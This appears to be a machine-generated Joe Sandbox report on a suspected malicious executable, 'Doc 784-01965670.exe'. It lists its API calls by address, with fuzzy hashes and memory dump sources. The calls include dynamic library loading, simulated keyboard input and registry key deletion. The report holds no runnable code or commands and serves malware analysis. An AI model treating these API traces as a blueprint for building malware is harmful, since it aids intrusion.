• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CurrentHandleProcess$Duplicate
• String ID: nul
• API String ID: 2124370227-2873401336
• Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
• Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
• Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
• Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 004438B7
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CurrentHandleProcess$Duplicate
• String ID: nul
• API String ID: 2124370227-2873401336
• Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
• Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
• Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
• Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
• LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
• SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
• DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
• Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
• Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
• Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
APIs
• PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
• TranslateMessage.USER32(?), ref: 0044308B
• DispatchMessageW.USER32(?), ref: 00443096
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID: *.*
• API String ID: 1795658109-438819550
• Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
• Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
• GetFocus.USER32 ref: 004609EF
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
• GetClassNameW.USER32(?,?,00000100), ref: 00460A37
• EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
• __swprintf.LIBCMT ref: 00460A7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
• String ID: %s%d
• API String ID: 991886796-1110647743
• Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
• Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
• Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
• Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _memset$_sprintf
• String ID: %02X
• API String ID: 891462717-436463671
• Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
• Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
• Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
• Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
APIs
• _memset.LIBCMT ref: 0042CD00
• GetOpenFileNameW.COMDLG32 ref: 0042CD51
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
• String ID: $OH$@OH$X
• API String ID: 3491138722-1394974532
• Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
• Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
• Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
• Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
APIs
• LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
• GetProcAddress.KERNEL32(?,?), ref: 00463E68
• GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
• GetProcAddress.KERNEL32(?,?), ref: 00463ECE
• FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
• Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
• Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
• Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
• Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
• SetKeyboardState.USER32(00000080), ref: 0044C3ED
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
• SendInput.USER32 ref: 0044C509
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
• Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
• Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
• Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
APIs
• RegEnumKeyExW.ADVAPI32 ref: 004422F0
• RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
• RegCloseKey.ADVAPI32(00000000), ref: 0044234E
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
• RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
• Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
• Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
• Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                    • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                    • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                    • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                    • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                    • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1822080540-0
                                                                                                                                    • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                    • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                    • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                    • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 659298297-0
                                                                                                                                    • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                    • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                    • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                    • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1300944170-0
                                                                                                                                    • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                    • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                    • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                    • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                    APIs
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(02FA1BE8,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(02FA1BE8,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 142311417-0
                                                                                                                                    • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                    • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                                    • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                    • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0044955A
                                                                                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                    • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                    • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1843234404-0
                                                                                                                                    • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                    • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                    • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                    • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
